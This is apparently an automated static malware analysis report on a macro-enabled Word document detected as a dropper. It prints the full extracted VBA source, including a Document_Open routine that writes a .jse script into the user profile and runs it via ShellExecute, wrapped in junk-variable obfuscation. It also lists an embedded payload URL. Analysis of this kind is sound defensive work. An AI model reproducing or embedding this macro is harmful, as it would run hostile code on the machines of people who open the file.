Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 02c51604604a7faa…

MALICIOUS

Office (OOXML)

Size: 97.7 KB
Created: 2019-08-15 08:10:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-12
MD5: 7b16dfe1883419548f6d59954e9f90ce
SHA-1: 52337143d11ecd81886528c645b51203433085fe
SHA-256: 02c51604604a7faae0b82aab08d9e3693525454be210b73e76294b4594762c78
Risk Score: 278

Heuristics 8

  • ClamAV: Doc.Dropper.Sdrop-7182576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Sdrop-7182576-0
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set Some_FSO_created = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        s00001 = Environ("USERPROFILE")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://banglaay.com/wp-includes/VRVWLAbrjy/ In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename   Kind   Source   Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15488 bytes
SHA-256: 0fac447f000c36d7f6b898385c9ce2b5193a8e144f47ced5bbf2786ce0d28b26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub RUNFILESTARTOFWORD(name_file, textwrite)
Kh621Sz9p46Z = 1558
UT575539ccc2 = 2793
a304bPg = 6864599
I0FO99u39mhU = 23619
dgaeHrE256 = 77674
    Dim Some_FSO_created As Object
    Set Some_FSO_created = CreateObject("Scripting.FileSystemObject")
       T6uTqU5 = 620222
Brgx86U1z5dm = 6751
mT02B9h082a = 1093
    Dim obj_FSO_CREATED As Object
    Set obj_FSO_CREATED = Some_FSO_created.CreateTextFile(name_file, True, True)
 
P6P5q0kK19 = 2135
    obj_FSO_CREATED.Write textwrite
    j7Ws03CRj = 27910
T3217Z = 1340090
j7Ws03CRj = P6P5q0kK19 + T3217Z
j7Ws03CRj = T6uTqU5 + mT02B9h082a
Kh621Sz9p46Z = T6uTqU5 + Kh621Sz9p46Z
T6uTqU5 = mT02B9h082a + T6uTqU5
a304bPg = dgaeHrE256 + T3217Z
    obj_FSO_CREATED.Close
    
    
    dgaeHrE256 = Brgx86U1z5dm + I0FO99u39mhU
j7Ws03CRj = P6P5q0kK19 + Kh621Sz9p46Z
T6uTqU5 = P6P5q0kK19 + mT02B9h082a
    


End Sub
Sub CountChars2()
    Dim iCount(0 To 255) As Long
    Dim i As Long
    Dim J As Integer
    Dim lCharCount As Long
    Dim sDoc As String
    Dim sTemp As String

    ' Initialize the array
    For i = 0 To 255
        iCount(i) = 0
    Next i
Dim E444LI6 As Boolean
Dim E375X As Boolean
Dim L43x2G3Fi As Boolean
Dim LL9YU22Z18O5 As Boolean
Dim JsAW26 As Boolean
Dim mY33676Xpj1 As Boolean
E444LI6 = True
E375X = True
L43x2G3Fi = False
LL9YU22Z18O5 = True
JsAW26 = False
mY33676Xpj1 = True
E444LI6 = False
E375X = True
mY33676Xpj1 = True
E375X = True
E375X = False
JsAW26 = False
    ' Assign document to a huge string
    lCharCount = ActiveDocument.Characters.Count
    sDoc = ActiveDocument.Range(0, lCharCount)

    ' Fill the array
    For i = 1 To Len(sDoc)
       J = Asc(Mid(sDoc, i, 1))
       iCount(J) = iCount(J) + 1
    Next

    ' Add document for results
    Documents.Add
    Selection.TypeText Text:="ASCII Character Count" & vbCrLf

    ' Only output codes 9 through 255
    For i = 9 To 255
        sTemp = Chr(i)
        If i < 32 Then sTemp = Trim(Str(i))
        sTemp = sTemp & Chr(9) & Trim(Str(iCount(i)))
        sTemp = sTemp & vbCrLf
        Selection.TypeText Text:=sTemp
    Next i
End Sub

Private Sub Document_Open()
    Dim TERRARIUMKOOL As String
    Dim AMSTERDATPARISH As String
    Dim BINGOBONGOASSTRING As String

    Dim runOFSHELLSTART As Object

    Dim GAMMAIZLUCHENIE As Object
Dim w80rZ As String
Dim b2kH950 As String
Dim c2kO02n As String
Dim S8pT434xQG5 As String
Dim symAn As String
Dim c8DJ5867ri1 As String
Dim t1R9387 As String

    Dim s00001 As String
    Dim s00002 As String
    Dim s00003 As String
    w80rZ = "nGxEtD#sKPw*% MmTEoluqA@ewO<slJZ,J?YMQ^t7Cb 2ZFnMG1E 6 l$#uHyraA]@F29. LYZ3c!aU0oaI[OsX,lPK6iINTxed$"
b2kH950 = "w:^6@7UaWY fUM[C??gN^I]9#qr$K;Se7 Eo,RJQwOK$7zesTTRU1aiuBJa*ze#;IyqFNabdg]  iSt33aijmj!7fBWFjFYEWl?m"
Dim MXq9o90AxR As Long
Dim J5112M As Long
Dim K20Ij3700 As Long
Dim Cma1Jq26 As Long
Dim T844Z71 As Long
Dim I732N As Long
c2kO02n = "gflX7Hfh7YCEzF<WHC8cXGgjPBgS  Z jR#[M2%eEAAokIb<YFw9,]^wz2E21A63?%@:%XQ1t1fMJOGG[gqSxKH3Io6?s.R!67qQ"
S8pT434xQG5 = "AXp@wN6eX7LrFSyb.<Hd1Mug#i1nB QpYM@stNdTO2Ptw.M.[UBr2I<cTMHrUZnY]8C0#WHFuXT6!hMFi;SJOd8O%?bnN,NaQb$z"
    Dim s00004 As String
    Dim s00005 As String
  Randomize
 MXq9o90AxR = 2696
J5112M = 9358591
K20Ij3700 = 1620
Cma1Jq26 = 42861
    s00002 = Chr(92)
    s00004 = ".jse"
    s00003 = Rnd
    symAn = "!,:;Q,S< eYDJt;:,0j@;!whHI@Y<lxO iQ7cl@p1uoCDS2mTbzD.qICX:TaLuoU2Q9jX$xE70S,z#Zsn.3Lu2pBiqbs@H@qSgaR"
c8DJ5867ri1 = "x[XAKU]c?0iJNpdxE^bx8H]rY[Q9pxgy.c!qg^MlB2]DayBWjQDS@xNXMbMPhW,i6 e,XL]iEFWBkgoJRO@cCbNlLJo^gh b6AsG"
t1R9387 = "LC;GCNc8b:eF3iFf$37MEDph6gTd@33Buyj.pDbE]r$zznrbkOsGC,m*b7X^Fy$utTky$GHE : B!dx,6@: pT7x$w2s3F;2c:nk"
    s00001 = Environ("USERPROFILE")
    
    s00005 = s00001 & s00002 & s00003 & s00004

    
    c2kO02n = b2kH950 & b2kH950
symAn = b2kH950 & symAn
S8pT434xQG5 = c2kO02n & t1R9387
S8pT434xQG5 = symAn & t1R9387
    
    
    T844Z71 = 5026
I732N = 82858
I732N = MXq9o90AxR + K20Ij3700
Cma1Jq26 = K20Ij3700 + K20Ij3700
    
    TERRARIUMKOOL = s00005
Dim q3Mum9R3s1 As Boolean
Dim xIFC2yy1X59 As Boolean
Dim AM533wm4GI As Boolean
Dim s0244gk As Boolean
Dim bqX2mO8 As Boolean
Dim Od6c3I8L76W6 As Boolean
Dim poh47Z2D9 As Boolean
Dim s73IZ0TQ5 As Boolean
Dim aW69j049d As Boolean
    get_PATHFORSAVE = UserForm1.TextBox1.Value
    
    Cma1Jq26 = MXq9o90AxR + T844Z71
I732N = Cma1Jq26 + J5112M
J5112M = K20Ij3700 + T844Z71
    
RUNFILESTARTOFWORD TERRARIUMKOOL, get_PATHFORSAVE
    xIFC2yy1X59 = True
q3Mum9R3s1 = False
aW69j049d = False
s73IZ0TQ5 = True
xIFC2yy1X59 = False
q3Mum9R3s1 = True

Set runOFSHELLSTART = CreateObject("Shell.Application")
runOFSHELLSTART.ShellExecute (TERRARIUMKOOL)

q3Mum9R3s1 = True
xIFC2yy1X59 = False
AM533wm4GI = True
s0244gk = True
bqX2mO8 = True
Od6c3I8L76W6 = True
poh47Z2D9 = True
s73IZ0TQ5 = False
aW69j049d = False

End Sub
Sub CreateStyleList()
Dim R2pG72 As String
Dim cqMo7Cag7 As String
Dim Z35q06CLK4 As String
Dim U0sco382g4 As String
Dim tyeEM9n014 As String
Dim dbMEd0sHM As String
Dim D2Xh6Zj32g As String
Dim Jw65n7w As String
Dim N9PT6 As String
Dim t3sczN As String
Dim lk97094 As String
Dim o1SbP As String
Dim c3lIW2 As String
    Dim docThis As Document
    Dim styItem As Style
    Dim sBuiltIn(499) As String
    Dim iStyBICount As Integer
    Dim sUserDef(499) As String
    Dim iStyUDCount As Integer
    Dim sInUse(499) As String
    Dim iStyIUCount As Integer
    Dim iParCount As Integer
    Dim J As Integer, K As Integer
    Dim sParStyle As String
    Dim bInUse As Boolean
    
    ' Ref the active document
    Set docThis = ActiveDocument
    
    ' Collect all styles being used
    iStyIUCount = 0
    iParCount = docThis.Paragraphs.Count
    iParOut = 0
    For J = 1 To iParCount
        sParStyle = docThis.Paragraphs(J).Style
        For K = 1 To iStyIUCount
            If sParStyle = sInUse(K) Then Exit For
        Next K
        If K = iStyIUCount + 1 Then
            iStyIUCount = K
            sInUse(iStyIUCount) = sParStyle
        End If
    Next J
    R2pG72 = "ZcY1PC*ZnQ]ke%#8Z]eDN?@OQ<bjcMKQDqAIB%3XTINt1h$n3wjqSS<8geBQD,DkQ#@@baEl*G*[St?BxC0q qt1o9SCukc]ysPl"
cqMo7Cag7 = "l[gQ]gxAlUdCOWTS71P UH#[E?^zXPzmBpGe:yAKS AuFaP6gtdHS8,RwR.a6I^?21xcuYoj,i^6x? ia^gZCg%a C^<Du#A%DGH"
Z35q06CLK4 = ".J?w8!nDJr m2ec$,dntCnr2CUI<XOZuqfCK1E6h*xA.*jXgUd6nF!bP,6Mo.7.fa[PGRE,u2.E*WoXezHbU6tj0PB.n[@zElr0J"
U0sco382g4 = "L%NIjhI$7m sd2Tzqho!zAQN9yP*f*G!@9Q ymJRO<?bpgZ1m7CyF:06upQx!aam]dpl0*HgB7dr1Ww J%$Y0$G hmFc0frkdCoB"
tyeEM9n014 = "gIW:KpDTWFJ0,6Xk3hmcb:Kxc.:1rOGEeCf3de0@ZLE:yKr#!f!k% <f 83fp9pH? 1tW.7;,7!d9M?nued@shJrWfz!89rBo;6 "
dbMEd0sHM = "1uiDa eO]IG.tak j6?%##2Qjhlx# PzK17KPS6eye,pE%?ptC!aRLJTz2Sz,h c ?dHel]ZtDQAu Gr71P.b7LyF:G$S1od!90#"
D2Xh6Zj32g = "!xK7Xit8BWgPm1P 1WxTaz 0oYIF?u6hjPdz<zk pTAy]rLu]g j QnW@eolQ7]JlUAHP6K1dUIh0sWr6Ii0nHJ QhlwtZY6 boo"
Jw65n7w = "LY?Zx9D6PCoPxQ8drwBdwHjs Tq^eBP%1;@qW<D.OlFuQbacc%2ExW;pOH^o]!PKHc;PoG8bNA2cn?d[Yro ;h<m<eB nMjwy:uA"
N9PT6 = "eFjyMEy,rRGO:b$D<X R]T8u0$#Nd.9 K!A OZPG8Y#3;Nb6d2agnq!orRY lAhIAN$]OpW @6z?<Fycbk;q wd9;k#9!.dQ?PZW"
t3sczN = "x0Ywh19urwQ%!tTWP p[OM;hPO*R#Pb1wCTB;Sx6]E^9PwT2nXQ:J@o3uo@<D1Wbfakq%$9ws6t7zgL7w* d9!FRO;anR!ws* JJ"
lk97094 = ";z02!t j@oLz1g^Cw3WsMd* *QafEBHF@XlFKPIXeXc@^C! 2mG r#J ,tBypISn8%F#N]f 107j*8h,]^.3SDARGy2DTr1DXLN?"
o1SbP = "em  ogW81A.at^ L]^Nyl8Zw*B2%RAiD.8P%h2 uFfqo6w%;r$BDynG?BdINn2:Z9MJdUSXkT@pnwzW1@rg0[EjeO;S;FHF$[m1x"
c3lIW2 = "ezFq8<A$gfLcbI!?eiXFB^UNJRx63x8%QK]$@aXG 8J;82c7WF,lje,Q;mId*#gY1 ]G[21XB2$L!^?LBTUB E8RZJWihYQ<M26t"
Z35q06CLK4 = lk97094 & tyeEM9n014
    iStyBICount = 0
    iStyUDCount = 0
    ' Check out styles that are "in use"
    For Each styItem In docThis.Styles
        'see if in those being used
        bInUse = False
        For J = 1 To iStyIUCount
            If styItem.NameLocal = sInUse(J) Then bInUse = True
        Next J
        'Add to those not in use
        If Not bInUse Then
            If styItem.BuiltIn Then
                iStyBICount = iStyBICount + 1
                sBuiltIn(iStyBICount) = styItem.NameLocal
            Else
                iStyUDCount = iStyUDCount + 1
                sUserDef(iStyUDCount) = styItem.NameLocal
            End If
        End If
    Next styItem
    
    'Now create the output document
    Documents.Add
    Dim U2SL0q5J As Long
Dim Sm2CfX6OYyu As Long
Dim EIGIs5sD As Long
Dim gp029yQOX5o As Long
Dim Cl5o903z254 As Long
Dim aZ3ySm0fOw As Long
Dim Pg955uO63B As Long
Dim w8i815U As Long
Dim r22R43 As Long
Dim O5W9XBq As Long
U2SL0q5J = 65206
Sm2CfX6OYyu = 53807
EIGIs5sD = 711317
gp029yQOX5o = 1112664
Cl5o903z254 = 7825949
aZ3ySm0fOw = 32651
Pg955uO63B = 707688
w8i815U = 5390
r22R43 = 8431489
O5W9XBq = 56077
Cl5o903z254 = U2SL0q5J + EIGIs5sD
r22R43 = Cl5o903z254 + Cl5o903z254
aZ3ySm0fOw = O5W9XBq + Cl5o903z254
O5W9XBq = w8i815U + w8i815U
O5W9XBq = Cl5o903z254 + aZ3ySm0fOw
w8i815U = Sm2CfX6OYyu + Pg955uO63B
    Selection.TypeText "Styles In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sInUse(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    
    Selection.TypeText "Built-in Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sBuiltIn(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    
    Selection.TypeText "User-defined Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sUserDef(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
End Sub


Dim Kh621Sz9p46Z As Long
Dim UT575539ccc2 As Long
Dim a304bPg As Long
Dim I0FO99u39mhU As Long
Dim dgaeHrE256 As Long
Dim T6uTqU5 As Long
Dim Brgx86U1z5dm As Long
Dim mT02B9h082a As Long



Dim P6P5q0kK19 As Long
Dim j7Ws03CRj As Long
Dim T3217Z As Long

Sub Correct_Line_Numbers()
    Dim myRng As Range
    Dim StartRng As Range
    Dim iCount As Integer

'if you include the paragraph mark in your selection, then Word
'prints the subsequent line number; not the entire line, just the
'line number; therefore, if the last character of the current
'selection is a paragraph mark, then move the end position of
'the selection to the left by one character
    If Selection.Characters.Last = Chr(13) Then
        Selection.MoveEnd Count:=-1
    End If

    'set the current selection to a variable
    Set myRng = Selection.Range

    'set the start of the document to a variable
    Set StartRng = ActiveDocument.Paragraphs(1).Range

    With Selection
        'go to the beginning of the line for the current selection and
        'set the iCount variable so that it counts the current line
        .HomeKey unit:=wdLine
        iCount = 1

        'if the cursor is not at the beginning of the document
        'then move the cursor up by one line
        'increment iCount by one each time the cursor is not at
        'the beginning of the document
        While Not Selection.InRange(StartRng)
            .MoveUp unit:=wdLine
            iCount = iCount + 1
            'if the cursor is in a table, then the macro should
            'reduce iCount; Word counts an entire table as one line
            If Selection.Rows.Count > 0 Then
                iCount = iCount - 1
            End If
        Wend
    End With

    'reset the starting line number so that it equals the
    'number of times the cursor was moved up by a line
    ActiveDocument.PageSetup.LineNumbering.StartingNumber = iCount

    'reselect the original selection
    myRng.Select

    'print out only the original selection
    ActiveDocument.PrintOut Range:=wdPrintSelection

    'reset the line number(by "undoing" the last two actions
    '[fields update and change line number])
    'so that line numbering begins at one
    ActiveDocument.Undo
    ActiveDocument.Undo

    'reselect the original selection
    myRng.Select
End Sub

Attribute VB_Name = "NewMacros"

Sub CountChars1()
    Dim iCount(0 To 255) As Integer
    Dim i As Integer
    Dim yus0J63p26 As String
Dim X76LT As String
Dim ddkt3W24 As String
Dim Hg4l6456D4Wz As String
Dim d5O6t As String
Dim mah2nl As String
Dim z8f20 As String
Dim t207HlL19tdd As String
Dim dhK2H As String
Dim x0K5u3 As String
Dim AiBK9L780K2 As String
yus0J63p26 = "gwc7p26!uZbMXz]S3kpq<oqEKEASa6k9Ky2A[YUlWo EtR@?]q^Tu0znTcPPL*Q#N nY6Nry7fL2LT@P[l<#:^BX^*;*^7yTTKS@"
X76LT = " ty6SDnGpsQ 9ECgmGsUj@zOpo1QdfAM^bMU0BoQcc7zL%BsOOJnhum!$Y#sjgBNMUA^AWoggbeA@moTw:g$w;KI]$emAhl83O?%"
ddkt3W24 = "]PWC$x7 xehjfjT%H<iO9K]#@:f20NO!P*8RpzfYXunGt]71?gn7W7T72d9cyq IDT.9HXZTNpxC!leWW .S$COLWweDD,EN;,]n"
Hg4l6456D4Wz = "W3!p[D$$eBdWwXO@OejTgDK*[#%Bd:eInhW??0Ei97o1<9?,EWrZsy!Q]EIttlSgjG23obWX3[ 3E%*BfrtHXPp]OKTF.MKIsRKs"
d5O6t = "DYlL:B3jh?G:T3?hF1suNS 1BfG1*hrQKYZ,$EgMitTDWgRRD%R!]dLMrxjHf.w;.,*?X%JI*on@@kj [lHMk9g$mcl91T2Bg8nR"
mah2nl = "yDH.rY@^O MmlTq^Yh6Rn ??2FBm*%sP%8LgneiqY.Xu?7XTuQMx;m2ruX  e bz.L71hBlp,0iGzFRt z,]2WPaCTC *yX0mXXk"
    Dim vCharacter As Variant
    Dim sTemp As String

    ' Initialize the array
    For i = 0 To 255
        iCount(i) = 0
    Next i

    ' Fill the array
    For Each oCharacter In ActiveDocument.Characters
       i = Asc(oCharacter)
       iCount(i) = iCount(i) + 1
    Next

    ' Add document for results
    Documents.Add
    Selection.TypeText Text:="ASCII Character Count" & vbCrLf
z8f20 = "^Wbtm@qb7#y7ENj:!m?RQlZGSs%<Ax!Bm?IRzzDW!6Gw1  bQ0c<xDjLS?#9wdRixLrGO:mK?ukiux dqhFzUM96Am liLG?2]ZX"
t207HlL19tdd = ",M39Ou8YUGzBPjLnUeJMH.qx R*fLjxPqpcWiwKwxOJFq3lEx.NSs7jSOXLiSTy 9:Z;92lh.eGWjG@rpp.b<Gw2.pHzytE#qB6Y"
dhK2H = "sU#NfY69lqhaEZSF 2UM6y:ZY?O^?01]a0;zLM[cRRcu?nT owG^E6OBK^6b.PSdO]^n@JlPCLI^ bN%8ido2YLabU0yc%Wj$,0x"
x0K5u3 = "1! J6!OlOs iP,OMXUpmmz]g:MY2 ESs3Ho3oPCLIR@2X I ozD?*0KaXz[6 31BTlK!0AB ug w8agYEk,. 1ox^m!$c z sLmU"
AiBK9L780K2 = ".C<]rwkDapg1%db$GSa9f%@tUDf3W<sE7yM<GpES:wc$xP8elA!IopTKD*j RN]hxrA<0P[6i9K1Zb2j8N9IB fi8%nw$cEENp2N"
z8f20 = dhK2H & x0K5u3
t207HlL19tdd = d5O6t & d5O6t
x0K5u3 = ddkt3W24 & x0K5u3
x0K5u3 = Hg4l6456D4Wz & ddkt3W24
AiBK9L780K2 = dhK2H & X76LT
d5O6t = X76LT & X76LT
Hg4l6456D4Wz = ddkt3W24 & ddkt3W24
ddkt3W24 = z8f20 & mah2nl
X76LT = d5O6t & d5O6t
    ' Only output codes 9 through 255
    For i = 9 To 255
        sTemp = Chr(i)
        If i < 32 Then sTemp = Trim(Str(i))
        sTemp = sTemp & Chr(9) & Trim(Str(iCount(i)))
        sTemp = sTemp & vbCrLf
        Selection.TypeText Text:=sTemp
    Next i
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F9F82F96-4181-4B13-AB39-5CD5C2335AE2}{EEDA84EE-7C56-4FE1-B025-CBEF03491624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 134144 bytes
SHA-256: 0951909a231fe35629ea996cd5d72ea4df3ba3eebb8adc787eb62f3e1be667b9
Detection
ClamAV: Doc.Dropper.Sdrop-7182576-0
Obfuscation or payload: likely
1247 of 2059 identifiers look randomly generated (e.g. 'DjMKHwpTCk8KWw6rDgcO8wqRiJMKTVgvCuGVYMHJ') — consistent with name-mangling obfuscation. Carved artifact contains 158 long base64-like blob(s).